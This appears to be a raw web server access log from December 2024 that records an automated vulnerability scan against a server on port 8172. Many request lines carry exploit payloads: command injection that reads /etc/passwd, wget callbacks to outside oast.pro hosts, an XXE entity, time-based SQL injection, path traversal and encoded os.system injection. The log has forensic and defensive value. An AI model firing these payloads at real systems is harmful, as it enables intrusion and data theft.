Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:83.0)+Gecko/20100101+Firefox/83.0 - 404 7 0 27 2024-12-10 04:56:13 103.153.214.94 GET /test.txt - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 23 2024-12-10 04:58:06 103.153.214.94 POST /xmlpserver/ReportTemplateService.xls - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 27 2024-12-10 04:58:41 103.153.214.94 POST /apply_sec.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+WebView/3.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 https://bcvt.kontum.gov.vn:8172 404 7 0 34 2024-12-10 04:58:43 103.153.214.94 POST /apply_sec.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/111.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login_pic.asp 404 7 0 24 2024-12-10 04:58:46 103.153.214.94 POST /apply_sec.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:97.0)+Gecko/20100101+Firefox/97.0 https://bcvt.kontum.gov.vn:8172/login_pic.asp 404 7 0 22 2024-12-10 05:00:02 103.153.214.94 POST /rest/tinymce/1/macro/preview - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.2+Safari/605.1.15 bcvt.kontum.gov.vn:8172 404 7 0 28 2024-12-10 05:00:02 103.153.214.94 GET /xmlpserver/convert xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//ctbq6epdf88k4t1c60lgoxbrkq1fxjf78.oast.pro/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6.1+Safari/605.1.15 - 404 7 0 25 2024-12-10 05:00:28 103.153.214.94 POST /cgi-bin/file_transfer.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.3.27 - 404 7 0 23 2024-12-10 05:00:54 103.153.214.94 POST /dashboard/uploadID.php - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-10 05:04:51 103.153.214.94 POST /node/1 _format=hal_json 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 28 2024-12-10 05:05:30 103.153.214.94 POST /pandora_console/index.php login=1 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 29 2024-12-10 05:05:33 103.153.214.94 POST /pandora_console/index.php sec=netf&sec2=operation/netflow/nf_live_view&pure=0 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 39 2024-12-10 05:05:54 103.153.214.94 PUT /wp-content/plugins/w3-total-cache/pub/sns.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.3)+AppleWebKit/616.20.13+(KHTML,+like+Gecko)+Version/17.7.74+Safari/616.20.13 - 404 7 0 37 2024-12-10 05:06:50 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/WebReferences 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.1.52 - 404 7 0 26 2024-12-10 05:06:52 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/Slots 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:86.0)+Gecko/20100101+Firefox/86.0 - 404 7 0 22 2024-12-10 05:09:05 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.0.0+Safari/537.36 - 404 7 0 27 2024-12-10 05:09:08 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Safari/605.1.15 - 404 7 0 23 2024-12-10 05:09:51 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.7.18 - 404 7 0 23 2024-12-10 05:13:11 103.153.214.94 POST /service/extdirect - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.1 - 404 7 0 29 2024-12-10 05:13:28 103.153.214.94 POST /adxmlrpc.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.1.15 - 404 7 0 23 2024-12-10 05:13:31 103.153.214.94 GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php 0=id 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 25 2024-12-10 05:15:41 103.153.214.94 POST /cgi-bin/supportInstaller - 8172 - 115.146.123.211 MSIE - 404 7 0 27 2024-12-10 05:17:15 103.153.214.94 POST /api/timelion/run - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 28 2024-12-10 05:17:50 103.153.214.94 POST /photo/p/api/album.php - 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 05:19:11 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:83.0)+Gecko/20100101+Firefox/83.0 - 404 7 0 26 2024-12-10 05:19:15 103.153.214.94 POST /_async/AsyncResponseService - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 23 2024-12-10 05:19:17 103.153.214.94 GET /_async/favicon.ico - 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-10 05:20:13 103.153.214.94 POST /CDGServer3/ClientAjax - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/110.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 05:20:37 103.153.214.94 POST /Autodiscover/Autodiscover.xml - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.9.17 - 404 7 0 24 2024-12-10 05:21:55 103.153.214.94 POST /artifactory/ui/auth/login _spring_security_remember_me=false 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.6.20 https://bcvt.kontum.gov.vn:8172/artifactory/webapp/ 404 7 0 25 2024-12-10 05:23:11 103.153.214.94 GET /backupsettings.dat - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 05:23:44 103.153.214.94 POST /mdm/client/v1/mdmLogUploader udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 31 2024-12-10 05:24:13 103.153.214.94 GET /card_scan.php No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20hzMyYiDYzY.txt%60 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 25 2024-12-10 05:24:16 103.153.214.94 GET /hzMyYiDYzY.txt - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.3.25 - 404 7 0 22 2024-12-10 05:25:03 103.153.214.94 GET /objects/getImage.php base64Url=YGlkID4gcGVxYnQudHh0YA===&format=png 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_0)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 28 2024-12-10 05:25:06 103.153.214.94 GET /objects/getImageMP4.php base64Url=YGlkID4gcGVxYnQudHh0YA===&format=jpg 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.2;+rv:128.0+)+Gecko/20100101+Firefox/128.0 - 404 7 0 23 2024-12-10 05:25:09 103.153.214.94 GET /objects/getSpiritsFromVideo.php base64Url=YGlkID4gcGVxYnQudHh0YA===&format=jpg 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.16;+rv:85.0)+Gecko/20100101+Firefox/85.0 - 404 7 0 29 2024-12-10 05:25:12 103.153.214.94 GET /objects/peqbt.txt - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/106.0.0.0+Safari/537.36 - 404 7 0 23 2024-12-10 05:25:43 103.153.214.94 GET /wp-content/plugins/chopslider/get_script/index.php id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 05:26:30 103.153.214.94 POST /content/2q0PiOxNlbeUshakWRVhcNqmdUB - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:87.0)+Gecko/20100101+Firefox/87.0 https://bcvt.kontum.gov.vn:8172 404 7 0 26 2024-12-10 05:26:32 103.153.214.94 POST /content/2q0PiOxNlbeUshakWRVhcNqmdUB.af.internalsubmit.json - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/616.16+(KHTML,+like+Gecko)+Version/17.0.90+Safari/616.16 https://bcvt.kontum.gov.vn:8172 404 7 0 24 2024-12-10 05:26:33 103.153.214.94 POST /search/ - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/90.0.4430.93+Safari/537.36 - 404 7 0 28 2024-12-10 05:26:38 103.153.214.94 POST /search/ - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0,+Win64,+x64,+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 34 2024-12-10 05:27:47 103.153.214.94 POST /mailingupgrade.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.65 - 404 7 0 34 2024-12-10 05:30:32 103.153.214.94 POST /v2/api/product/manger/getInfo - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:104.0)+Gecko/20100101+Firefox/104.0 - 404 7 0 28 2024-12-10 05:30:36 103.153.214.94 POST /ajax/api/content_infraction/getIndexableContent - 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 05:33:10 103.153.214.94 POST /service/rapture/session - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 29 2024-12-10 05:33:15 103.153.214.94 POST /service/rest/beta/repositories/bower/group - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 25 2024-12-10 05:33:31 103.153.214.94 POST /cgi-bin/login.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 05:35:49 103.153.214.94 POST /module/ - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 https://bcvt.kontum.gov.vn:8172admin/view:modules/load_module:users 404 7 0 26 2024-12-10 05:35:49 103.153.214.94 POST /module/ - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.110+Safari/537.36 https://bcvt.kontum.gov.vn:8172admin/view:modules/load_module:users 404 7 0 26 2024-12-10 05:35:49 103.153.214.94 POST /module/ - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5.1+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172admin/view:modules/load_module:users 404 7 0 22 2024-12-10 05:38:24 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 31 2024-12-10 05:39:00 103.153.214.94 POST /pandora_console/ajax.php page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 24 2024-12-10 05:39:00 103.153.214.94 POST /context.json - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.16 - 404 7 0 28 2024-12-10 05:40:29 103.153.214.94 POST /console/css/%2e%2e%2fconsole.portal - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.24 - 400 0 0 30 2024-12-10 05:41:22 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 115.146.123.211 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 33 2024-12-10 05:41:26 103.153.214.94 GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2q0PiYJkYrMXPIO23HlYa7dUgB4.txt - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 30 2024-12-10 05:42:36 103.153.214.94 POST /console/images/%2e%2e%2fconsole.portal - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.20 - 400 0 0 30 2024-12-10 05:42:55 103.153.214.94 POST /mifs/.;/services/LogService - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.3.17 https://bcvt.kontum.gov.vn:8172 404 7 0 29 2024-12-10 05:44:19 103.153.214.94 GET /webadmin/tools/unixlogin.php login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6e457755476c514e316870555730795530525257474633536c565465545a6c6245685622207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/webadmin/admin/service_manager_data.php 404 7 0 42 2024-12-10 05:44:23 103.153.214.94 GET /webadmin/out - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:90.0)+Gecko/20100101+Firefox/90.0 https://bcvt.kontum.gov.vn:8172/webadmin/admin/service_manager_data.php 404 7 0 22 2024-12-10 05:48:03 103.153.214.94 GET /user/login - 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 30 2024-12-10 05:49:46 103.153.214.94 POST /run - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 26 2024-12-10 05:50:11 103.153.214.94 GET /Collector/storagemgmt/apply data%5B0%5D%5Bhost%5D=%60/bin/wget+http://ctbq6epdf88k4t1c60lgcswyd7b4i8ioh.oast.pro%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype 8172 - 115.146.123.211 - - 404 7 0 24 2024-12-10 05:50:11 103.153.214.94 GET /Collector/nms/addModifyZTDProxy ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://ctbq6epdf88k4t1c60lgddxad6gkecfig.oast.pro) 8172 - 115.146.123.211 - - 404 7 0 25 2024-12-10 05:51:50 103.153.214.94 GET /fuel/login/ - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 27 2024-12-10 05:51:50 103.153.214.94 POST /fuel/login/ - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/111.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 26 2024-12-10 05:51:50 103.153.214.94 GET /fuel/pages/items/ search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 8172 - 115.146.123.211 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 28 2024-12-10 05:53:39 103.153.214.94 POST /ajax/render/widget_tabbedcontainer_tab_panel - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 05:54:18 103.153.214.94 GET /user/login - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+CrOS+x86_64+14816.131.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/103.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-10 05:56:16 103.153.214.94 GET /include/exportUser.php type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Eniia.txt 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - 404 7 0 27 2024-12-10 05:56:20 103.153.214.94 GET /include/niia.txt - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/116.0 - 404 7 0 33 2024-12-10 05:57:44 103.153.214.94 GET /api/experimental/test - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+13.0)+AppleWebKit/617.28+(KHTML,+like+Gecko)+Version/17.0+Safari/617.28 - 404 7 0 28 2024-12-10 05:57:47 103.153.214.94 GET /api/experimental/dags/example_trigger_target_dag/paused/false - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 05:57:52 103.153.214.94 POST /api/experimental/dags/example_trigger_target_dag/dag_runs - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Mobile/15E148+Safari/604.1 - 404 7 0 24 2024-12-10 05:59:14 103.153.214.94 POST /login - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 bcvt.kontum.gov.vn:8172/module/login/login.html 404 7 0 27 2024-12-10 05:59:14 103.153.214.94 POST /index.php option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image 8172 - 115.146.123.211 Mozilla/5.0+\(Windows+NT+10.0\;+Win64\;+x64\)+AppleWebKit/537.36+\(KHTML,+like+Gecko\)+Chrome/100.0.4896.60+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 23 2024-12-10 05:59:14 103.153.214.94 POST /index.php option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 22 2024-12-10 05:59:45 103.153.214.94 GET /wp-content/plugins/import-xml-feed/readme.txt - 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 06:00:05 103.153.214.94 POST /lib/crud/userprocess.php - 8172 - 115.146.123.211 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 06:00:09 103.153.214.94 GET /login.php - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 24 2024-12-10 06:00:09 103.153.214.94 POST /cgi-bin/login.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 https://bcvt.kontum.gov.vn:8172 404 7 0 27 2024-12-10 06:00:12 103.153.214.94 POST /cgi-bin/system_log.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 22 2024-12-10 06:00:13 103.153.214.94 POST /lib/crud/userprocess.php - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 24 2024-12-10 06:03:26 103.153.214.94 POST /carbon/generic/save_artifact_ajaxprocessor.jsp - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.7+Safari/537.36 - 404 7 0 41 2024-12-10 06:04:05 103.153.214.94 POST /jars/upload - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 28 2024-12-10 06:04:05 103.153.214.94 GET /fw.login.php apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 24 2024-12-10 06:04:08 103.153.214.94 GET /jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpoc - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 400 0 0 26 2024-12-10 06:04:08 103.153.214.94 GET /cyrus.index.php service-cmds-peform=%7C%7Cwhoami%7C%7C 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 24 2024-12-10 06:04:27 103.153.214.94 GET /admin/ - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 31 2024-12-10 06:04:30 103.153.214.94 GET /admin/ - 8172 - 115.146.123.211 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 06:08:07 103.153.214.94 GET / p=1 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/618.2.7+(KHTML,+like+Gecko)+Version/17.5+Safari/618.2.7 - 404 7 0 26 2024-12-10 06:08:33 103.153.214.94 POST /var - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.26 https://bcvt.kontum.gov.vn:8172 404 7 0 23 2024-12-10 06:08:35 103.153.214.94 POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.11;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 7 0 25 2024-12-10 06:11:29 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.20 - 404 7 0 26 2024-12-10 06:11:32 103.153.214.94 GET /cgi-bin/execute_cmd.cgi timestamp=1589333279490&cmd=cat%20/etc/passwd 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 24 2024-12-10 06:12:03 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.16 - 404 7 0 23 2024-12-10 06:12:16 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 24 2024-12-10 06:12:23 103.153.214.94 GET /index.php fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 37 2024-12-10 06:12:30 103.153.214.94 GET /login.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.12+(KHTML,+like+Gecko)+Version/17.3+Safari/617.12 - 404 7 0 24 2024-12-10 06:16:35 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 